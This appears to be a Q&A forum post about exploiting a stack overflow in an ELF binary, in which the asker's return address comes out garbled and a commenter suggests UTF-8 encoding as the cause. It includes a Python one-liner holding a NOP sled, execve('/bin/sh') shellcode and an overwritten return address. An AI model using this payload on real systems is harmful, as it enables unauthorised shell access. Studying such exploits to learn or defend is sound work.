# Buffer overflow, register wrong hex input

Tags: c++, security, assembly

Trying to exploit a stack overflow. Found te offset to write to the $RSP buffer, when i write to it with normal letters like "A", it gets translated to the correct adress, same if i put the hex value such as "\x41", it gets added to $RSP buffer and used on return.

But then i try to write a memory adress in hex, it does not get translated correctly. Example when i run the code for "\xf0\xe1\xfd\xff\xff\x7f" in the position that overwrites the RSP, the RSP gets set to:

RSP: 0x7ffffffde1d8 --> 0xbfc3bdc3a1c3b0c3

Anyone have any idea what is happening?

---

I am doing this with bash on windows running ubuntu subsystem.

---

Don't have the source code, only the elf and debbuging with gdb.

[Screenshot of breakpoint after the RSP has been updated](https://i.stack.imgur.com/raG2F.png)

Python code used to generate input, feeded into a .txt file and the run inside gdb with the elf file.:

```
sys.stdout.write('\x90'*10+'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'+'A'*11 + "\xf0\xe1\xfd\xff\xff\x7f" + "\0"*2 + '\x90'*400)
```

Comment: you are gonna have to show code

Comment: Looks like you have encoded it in utf8.